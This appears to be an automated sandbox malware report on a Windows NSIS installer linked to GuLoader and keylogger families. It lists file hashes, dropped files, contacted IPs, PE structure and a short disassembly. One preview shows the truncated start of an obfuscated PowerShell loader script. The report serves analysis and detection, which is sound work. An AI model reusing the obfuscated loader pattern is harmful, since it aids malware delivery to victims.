                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target powershell.exe, PID 2572 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                    TimeTypeDescription
                                                                    21:07:34API Interceptor36x Sleep call for process: powershell.exe modified
                                                                    21:08:51API Interceptor20x Sleep call for process: msiexec.exe modified
                                                                    No context
                                                                    No context
                                                                    No context
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    37f463bf4616ecd445d4a1937da06e194NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 216.58.206.78
                                                                    • 142.250.181.225
                                                                    ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 216.58.206.78
                                                                    • 142.250.181.225
                                                                    YrCSUX2O3I.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 216.58.206.78
                                                                    • 142.250.181.225
                                                                    4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 216.58.206.78
                                                                    • 142.250.181.225
                                                                    4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 216.58.206.78
                                                                    • 142.250.181.225
                                                                    Cpfkf79Rzk.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 216.58.206.78
                                                                    • 142.250.181.225
                                                                    TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 216.58.206.78
                                                                    • 142.250.181.225
                                                                    Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 216.58.206.78
                                                                    • 142.250.181.225
                                                                    WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 216.58.206.78
                                                                    • 142.250.181.225
                                                                    TVPfW4WUdj.exeGet hashmaliciousGuLoaderBrowse
                                                                    • 216.58.206.78
                                                                    • 142.250.181.225
                                                                    No context
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):53158
                                                                    Entropy (8bit):5.062687652912555
                                                                    Encrypted:false
                                                                    SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                    MD5:5D430F1344CE89737902AEC47C61C930
                                                                    SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                    SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                    SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                                    File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                                    Category:dropped
                                                                    Size (bytes):486421
                                                                    Entropy (8bit):1.2470433609131586
                                                                    Encrypted:false
                                                                    SSDEEP:1536:p9ffEEX6My2RPkr6vyxsgBVdhrF8pGQkuxMSmLgnrL94:bffg2CJbdlFhh2Mwl4
                                                                    MD5:858C7D246EC84B37359FDE23A9F8898A
                                                                    SHA1:2046EFB2E9421F1F1C0CABA9F0D7ECCAD1F4AE0F
                                                                    SHA-256:100C199A129F94FB16BDD51943FB691AB055CEA690088691C0F989D4C1C75884
                                                                    SHA-512:547AA46E6279DD8DF920C2BF21B5A98B47F8B2F81E32FB36678119BC9510CA7D358C38C63E46E71285B76236D46D515CFE7C4DEA37660AE63E533AB78878ABBB
                                                                    Malicious:false
                                                                    Preview:......................................................................;.............................................................Do.......................................9.....................................................................................8...................T......................................................................................................................................k.............................................................{.(................c.............................).....s..................... ..................N.............q............2..............................................................................................c...................C..........................................G......................`.......|..............7.........0!..................p.........'..............)..........v.z.......................................................................................................[.s............~..A...+..
                                                                    Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (4311), with CRLF, LF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):72400
                                                                    Entropy (8bit):5.192574154183547
                                                                    Encrypted:false
                                                                    SSDEEP:1536:AGGe3wKH5jk6dqKN1hsYIOWl8/4noyXgRCopjLSz/1cqtssTzDyohZuK:ALgwKZjNdJN/IXlK4oyXMpja6Ypj/qK
                                                                    MD5:FC1243B96424C77D582F495E7572027B
                                                                    SHA1:21AF8B3AEAECBD754C5FE4F3B3FE84CF741AC9C4
                                                                    SHA-256:2DB217565103029D09CF451F3FACECFF81BEA4D089D1BFE4CCF297B53E2F3CB7
                                                                    SHA-512:E35C6DFE1699C9B4011E42A5EFD16F317E718101C7D8A81867B1E2951021BD4DAC0AC59B5AAA9E358E4CB0FA3F0A98C4F279A8B37A0DBFC5F031F9EE1DFEBB91
                                                                    Malicious:false
                                                                    Preview:$Temporresncubators=$Reheeling218rugerlisten;.....<#Iridectropium Flyswat Bronkoskoperingernes winnowing Stuehus Cleithral Phyllocyst #>..<#Axifugal Dekomprimeret Seismographer Opuscle Antimeson Spanskrrsstok #>..<#Beliggenheders Deceivance Luftgeners Dipodomyinae Diarrbe Krydstogters Fling #>..<#Backyarder Tronbestigning Reauthorises Selskabsproblemet Parforceridt Coughs Galliumoxid #>..<#Delmoments Essenism Olds Cabining Sjakformndenes #>..<#Regrupperingslejre Saddletrees Blokstrukturens aandsnrvrelse #>...$Disfavoured = @'.Hygrosc.Oenocyt$PartereRSchfereeenmarblhImpu.sfe.ilhvise RandrulSessioniBlueblanBarmhjeg Lame r2 calva 1overnot8u,troner .pinode RidmardTankefll J laparSu typer B terneBiophysd,ntibakeTelextjrFornyelsAnisses=Untugge$Holo laS,weethem obligarVinylflg Aabensa Pochera BilggesTidsangeMemoryfrRapunsln AjatsaeHenst.a;Mesocoe.Nystrgef VegetauMaenadinin grebc,egaenbtAntifediParlameocastigan,verthr lithuaTThetemph GangliaGaapaamnDesaminkValenhefAkvaplauHousemalThermoclAnn
                                                                    Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):315374
                                                                    Entropy (8bit):7.718302595085237
                                                                    Encrypted:false
                                                                    SSDEEP:6144:k1gcaHtn8nWPiQWxAnN/iF14M4337pvwMXMbp2O3oL0z8QOT78wtPaB6:AgcS8nAnWxAtiF14rJMbwO3HrJwhaB6
                                                                    MD5:B82937D4161F35374A360149D43614E7
                                                                    SHA1:E42EADA7A06078688C363E341ADCE37237B510B3
                                                                    SHA-256:DE1F8A1AE7BC242425197B7C5206A558543559A1BF5B5BFA5B4B11EC5CD4FBDF
                                                                    SHA-512:90BA42E077A4F569143F935D07A263AF64966D382D4B9ADED1E462B6AE54F195DC07CE6FB67A96AEEF003B4DB13D99DEF1D84B686CC194FC985A56EA0A9999A8
                                                                    Malicious:false
                                                                    Preview:..7777.................o.......................................5555.........!.f...............rrr..........RRRR......99.................../......LL.........|............OO...............................................]...........PP.......a.........................RRR..""....................................|..............>......====.......D.....................s........3.......................).....................FF...llll...s..'''.\\\\.................. .....................5...rrr........_.\....................*... ..............................~~~~.........333.//.........N.....[[[[[[..._..$...~......#.........&...............JJ...............MMMMMM................ ........p........bb.....bbbbb.....................[....t.......f.''....m............ZZ...P..z.............WWW.................................]]]]]]].XXX......n....vvv..........%........... .............................]...........~~..tt...............////.......NNNNN...ggggg..............<<<<.....K.~.........p.....M..
                                                                    Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                                    File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0, imaginary
                                                                    Category:dropped
                                                                    Size (bytes):462783
                                                                    Entropy (8bit):1.2514895750557933
                                                                    Encrypted:false
                                                                    SSDEEP:1536:gR0px6Iw5kvIV8FuWk8mGWwi1BoFIN8oYd:jmIwavC6utxgIjYd
                                                                    MD5:77218C2134D28A666F2FDEAA5E452489
                                                                    SHA1:16E2234D9C2F4E4265D1362887B40149B9E31823
                                                                    SHA-256:A901A3525DC18A4A9E6EF655931252D8258D954D419FCE81668F251C8EF54EE5
                                                                    SHA-512:AFE9F39C392A6DE29B551393CB032534D04AA18B82E747406A23828DE7B4088FBA3045F0DD8ECC37C3A4FE45125605C0504EA8A1C38DA429624A35753E8E3ED2
                                                                    Malicious:false
                                                                    Preview:....................]l................pq......................................................................................................p..........................................&...........................................................................].................v.................,.............................................................*.........................+........2.............................GI=..............,............................I............to....{........................8...........f..........XF.........O.............................................................].................-....................+........................2...........................B......................m.....^......................................................................................z....;.........x.....................................................................................................................4.............6...6............s.................
                                                                    Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):457562
                                                                    Entropy (8bit):1.2482312628496608
                                                                    Encrypted:false
                                                                    SSDEEP:1536:2jMpNhAlrasgHvP3V5s9ASYucRtPbRS9y:hpNhX93V5sOSTczjB
                                                                    MD5:E4AC954ED484155B2A165BF00B1E8A4F
                                                                    SHA1:21ACBAC21538E0258892381807BBE19524DA02E3
                                                                    SHA-256:3078C30C80C29C473A796C4E1FE5F89A175D9B23FC88DBCD0262D93B0C67BEED
                                                                    SHA-512:A63E484A5CF926E2484B69210BE047B1F90DAC2A0F813E33D2F1B507CC45AF21169AEC9EBEAA6152CDB2448BEE7B09D82E4427C7596E864B09A7A15560D323AC
                                                                    Malicious:false
                                                                    Preview:.......v......... ....:...........r.........................V.......l...Z...^.....................q........................l.........d.c............................................................Y.........................7.....................................o.....................T.................................T...................................n..............................................................g.3......................................................o.....................................X..0.....................................................:..........................Z?..........................s........O........>.................._.................................P.................................................$.................M.....................1........-..............................................I...........(..............................................................m..............-................................................o.....................
                                                                    Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):327732
                                                                    Entropy (8bit):1.2609335393847756
                                                                    Encrypted:false
                                                                    SSDEEP:768:rbmwczlydY1vPDT6+VOPnd7avS0bYT7bUkf0+VNt8xT70sob8aN/qfizqd71OFNj:sQdCVXhCo3Vxd/SRgV133ZBLlo
                                                                    MD5:622032628F068FE10CC2E51D0502CC9A
                                                                    SHA1:5AE897F10B51533C20489B755F4395FCED7EB67C
                                                                    SHA-256:840F31C02A7A8CA755C4CD53619D9F93BB42848DD334B25A0A3C72B13F5753F4
                                                                    SHA-512:2E5C98D7E3FE856D22381B2B97BAC5DF50C82859CB62DCF1D2FE3386B79D96446887FECB59D43F924200532399307E3846DDECA33FB87A286ADD5E6CEFC10637
                                                                    Malicious:false
                                                                    Preview:.).............\....................).....................q............A.....c..................................[..,........................(...................................................................}...................................................^................`.................................%.............................................................................L....................~d...............N..........................................h......~.............................~.........B...................Z....0..........................q................................v.......................................k............Y.............................................|..................................................................1.................T......................................................................................................................k........................................D...-.V..z...'........................................
                                                                    Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):433848
                                                                    Entropy (8bit):1.255481788885247
                                                                    Encrypted:false
                                                                    SSDEEP:768:8agBmxdiio94Vue1rGruEhQHTvyGPHzfrm75zidpc8oUH392slzddIRzyP98UmYu:NgKjnn/NnW5hQAPAfMqoDH+bI
                                                                    MD5:7586252625434A405256063977B84D0D
                                                                    SHA1:BA800F4510A4940F6EA11F866E3F4AF9805BDFD4
                                                                    SHA-256:5AFA5BC29281632F196999E16D8F4B26F2C14EC6A8A5F589DC5932B6DE78A2A7
                                                                    SHA-512:613E03C6EC8DFBE0B2B6A450B30B932157FE40121E6A7E4AE9FB188193AB6E5D3CA044F30351A3E969FD84BAC8BC7AD2B7DD5E9D0BB091FEDE0546CC9E3A3856
                                                                    Malicious:false
                                                                    Preview:...............1.............L..................................................................3...............................m...............................................................................................y...........n.................A................G...........$............................m.........................X..............................................................................5.....G.............^....................................\........v.....................-......................................................."............................V........0....................G.........................................................................................................#.....B...............V.....................x............U......................T................................>.................w..............;.....................................L.....................................................................y,.................
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Category:dropped
                                                                    Size (bytes):1060792
                                                                    Entropy (8bit):7.56576191182161
                                                                    Encrypted:false
                                                                    SSDEEP:24576:bj+EJoIVlLHDiemfwmNG3Ap137dboaPjyMi76Kbh:v+xIDXoIt3IRM+i76s
                                                                    MD5:69C59075BC9FFD11BF75080CFE44F29E
                                                                    SHA1:E1CB7F85EB9236FAD345BC1E3F941219CDF84EDC
                                                                    SHA-256:EBDA1DB301F4E3E3500292B8C519298D577CB9908B94F106A3CBE8C83136A423
                                                                    SHA-512:163C7AAD4458A5E9BED67D4B20EC2DC06011F249003BC68DB7F38C4E8B617F457D2C9E0C8838D2BF7F63170CDF3C10D430F29110C0BB8C491928808AEC3258B6
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 61%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@..........................@.......................................................P...............&...............................................................................................text....`.......b.................. ..`.rdata..`............f..............@..@.data................|..............@....ndata.......P...........................rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\Desktop\ro7eoySJ9q.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):327124
                                                                    Entropy (8bit):1.2472891497347776
                                                                    Encrypted:false
                                                                    SSDEEP:768:qw1bcEnP59OCTltLumdIdNK2mkVYYHN44jjU5S6EP1KRuM/VTCo0oXATL4bYZcOO:jucypY8Gyju3O4/iALDvWJTAnjPqqaO
                                                                    MD5:0EC84A842970A2C0B04893F66217F733
                                                                    SHA1:E100ACDACE598C27B00E0AF658306942A70228FC
                                                                    SHA-256:6B3552FC5295BE3AE9FADD8AFA8A06103BD60DDB6E0BE924C61B346895505A7A
                                                                    SHA-512:27270395859FEF2B270B7C2C70FA587BAF4FDCFF742DA93B6F7D1B0B82B5B1FF0BA9004BD3B825A9A62FAE75FB0F792A176ECE980529B61A2FEADE958B8B0BFB
                                                                    Malicious:false
                                                                    Preview:................:............................q......................[.................c.....................................{.... ..................................K....U............4.........................................@.........................................................\...............e...........................3................J.........L*....................................................................................(.......@..........................................................................g....................4.............................b.......2...............................p.....t.......................4\.................&......d...........................................................................................k......k........................................................................................................................................................................................\....................................0........M
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.56576191182161
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:ro7eoySJ9q.exe
                                                                    File size:1'060'792 bytes
                                                                    MD5:69c59075bc9ffd11bf75080cfe44f29e
                                                                    SHA1:e1cb7f85eb9236fad345bc1e3f941219cdf84edc
                                                                    SHA256:ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423
                                                                    SHA512:163c7aad4458a5e9bed67d4b20ec2dc06011f249003bc68db7f38c4e8b617f457d2c9e0c8838d2bf7f63170cdf3c10d430f29110c0bb8c491928808aec3258b6
                                                                    SSDEEP:24576:bj+EJoIVlLHDiemfwmNG3Ap137dboaPjyMi76Kbh:v+xIDXoIt3IRM+i76s
                                                                    TLSH:B8352312B251D48EE4720632E95BE67D043ADF1CDD504A1727A43F9F397BA826C7428F
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@
                                                                    Icon Hash:0d4f7fd151493b07
                                                                    Entrypoint:0x4031dd
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x519965E1 [Sun May 19 23:53:05 2013 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:7fd61eafe142870d6d0380163804a642
                                                                    Signature Valid:false
                                                                    Signature Issuer:CN=Cadamba, O=Cadamba, L=Pagney, C=FR
                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                    Error Number:-2146762487
                                                                    Not Before, Not After
                                                                    • 24/06/2024 10:55:01 24/06/2027 10:55:01
                                                                    Subject Chain
                                                                    • CN=Cadamba, O=Cadamba, L=Pagney, C=FR
                                                                    Version:3
                                                                    Thumbprint MD5:A1DDD1E0B2FDEE711CFF6DC5EF151203
                                                                    Thumbprint SHA-1:E1D495360FBCBEFE3EB73B2B05198778C4E351AA
                                                                    Thumbprint SHA-256:7937613CCFB0CF0772387EDE47A346B0A09760A520BEF4DABB06C92C2294CB5B
                                                                    Serial:3B493B0032D7E072710BAB5C19E1E82C545F1684
                                                                    Instruction
                                                                    sub esp, 000002D4h
                                                                    push ebx
                                                                    push ebp
                                                                    push esi
                                                                    push edi
                                                                    push 00000020h
                                                                    xor ebp, ebp
                                                                    pop esi
                                                                    mov dword ptr [esp+18h], ebp
                                                                    mov dword ptr [esp+10h], 0040A2D8h
                                                                    mov dword ptr [esp+14h], ebp
                                                                    call dword ptr [00408034h]
                                                                    push 00008001h
                                                                    call dword ptr [00408134h]
                                                                    push ebp
                                                                    call dword ptr [004082ACh]
                                                                    push 00000008h
                                                                    mov dword ptr [00434F58h], eax
                                                                    call 00007FCE79459DE5h
                                                                    mov dword ptr [00434EA4h], eax
                                                                    push ebp
                                                                    lea eax, dword ptr [esp+34h]
                                                                    push 000002B4h
                                                                    push eax
                                                                    push ebp
                                                                    push 0042B1B8h
                                                                    call dword ptr [0040817Ch]
                                                                    push 0040A2C0h
                                                                    push 00433EA0h
                                                                    call 00007FCE79459A50h
                                                                    call dword ptr [00408138h]
                                                                    mov ebx, 0043F000h
                                                                    push eax
                                                                    push ebx
                                                                    call 00007FCE79459A3Eh
                                                                    push ebp
                                                                    call dword ptr [0040810Ch]
                                                                    cmp word ptr [0043F000h], 0022h
                                                                    mov dword ptr [00434EA0h], eax
                                                                    mov eax, ebx
                                                                    jne 00007FCE79456F5Ah
                                                                    push 00000022h
                                                                    mov eax, 0043F002h
                                                                    pop esi
                                                                    push esi
                                                                    push eax
                                                                    call 00007FCE794594ACh
                                                                    push eax
                                                                    call dword ptr [00408240h]
                                                                    mov dword ptr [esp+1Ch], eax
                                                                    jmp 00007FCE79457019h
                                                                    push 00000020h
                                                                    pop edx
                                                                    cmp cx, dx
                                                                    jne 00007FCE79456F59h
                                                                    inc eax
                                                                    inc eax
                                                                    cmp word ptr [eax], dx
                                                                    je 00007FCE79456F4Bh
                                                                    add word ptr [eax], 0000h
                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85a00xb4.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x2eba8.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x1026d00x8e8
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x60100x6200c51ae685760de510818d22f29d66b8b0False0.6646603954081632data6.440168137798694IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x80000x14600x160024345ed7377f4b4663284282b5ef48b3False0.42134232954545453data4.947177345443015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xa0000x2af980x600dc268be7d1af6fdfcd38d44492cfdaf5False0.486328125data3.791234740340295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x350000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x550000x2eba80x2ec00bdebbd0274fda95ee828978bf6f6217fFalse0.3979413853609626data3.9167771947187013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0x553880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.364929610789069
                                                                    RT_ICON0x65bb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.403011351692243
                                                                    RT_ICON0x6f0580x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.4087218045112782
                                                                    RT_ICON0x758400x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4187615526802218
                                                                    RT_ICON0x7acc80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.40298771846953235
                                                                    RT_ICON0x7eef00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4413900414937759
                                                                    RT_ICON0x814980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4702157598499062
                                                                    RT_ICON0x825400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5204918032786885
                                                                    RT_ICON0x82ec80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5824468085106383
                                                                    RT_DIALOG0x833300x100dataEnglishUnited States0.5234375
                                                                    RT_DIALOG0x834300x11cdataEnglishUnited States0.6091549295774648
                                                                    RT_DIALOG0x835500xc4dataEnglishUnited States0.5918367346938775
                                                                    RT_DIALOG0x836180x60dataEnglishUnited States0.7291666666666666
                                                                    RT_GROUP_ICON0x836780x84dataEnglishUnited States0.7272727272727273
                                                                    RT_VERSION0x837000x1d8dataEnglishUnited States0.5317796610169492
